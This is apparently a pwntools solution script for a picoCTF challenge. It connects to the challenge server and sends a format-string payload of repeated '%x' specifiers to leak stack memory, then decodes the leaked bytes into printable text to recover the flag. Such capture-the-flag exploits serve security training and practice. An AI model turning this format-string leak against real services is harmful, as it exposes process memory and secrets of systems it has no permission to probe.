44 lines
1.1 KiB
Python
44 lines
1.1 KiB
Python
|
#!/usr/bin/env nix-shell
|
||
|
|
#!nix-shell -i python3 -p python3 python3Packages.pwntools
|
||
|
|
|
||
|
|
from pwn import *
|
||
|
|
|
||
|
|
ADDR = "mercury.picoctf.net 59616"
|
||
|
|
HOST, PORT = ADDR.split(" ")
|
||
|
|
|
||
|
|
def main():
|
||
|
|
for x in range(1,2):
|
||
|
|
r = remote(HOST, PORT)
|
||
|
|
r.recvline()
|
||
|
|
r.recvline()
|
||
|
|
r.recvline()
|
||
|
|
r.recvline()
|
||
|
|
r.recvline()
|
||
|
|
r.sendline(b'1')
|
||
|
|
r.recvline()
|
||
|
|
r.recvline()
|
||
|
|
r.recvline()
|
||
|
|
|
||
|
|
# r.sendline(f'%{x}$s'.encode())
|
||
|
|
# print(f'%{x}$s'.encode())
|
||
|
|
r.sendline(b"%x." * 99 + b"%x")
|
||
|
|
r.recvline()
|
||
|
|
result = r.recvline()
|
||
|
|
print(result)
|
||
|
|
unpacked = []
|
||
|
|
for x in result.strip().split(b"."):
|
||
|
|
x = int(x, 16)
|
||
|
|
print(x)
|
||
|
|
unpacked.extend([
|
||
|
|
(x & 0x000000FF),
|
||
|
|
(x & 0x0000FF00) >> 8,
|
||
|
|
(x & 0x00FF0000) >> 16,
|
||
|
|
(x & 0xFF000000) >> 24,
|
||
|
|
])
|
||
|
|
for x in unpacked:
|
||
|
|
if x >= ord('!') and x <= ord('~'):
|
||
|
|
print(chr(x), end='')
|
||
|
|
|
||
|
|
if __name__ == "__main__":
|
||
|
|
main()
|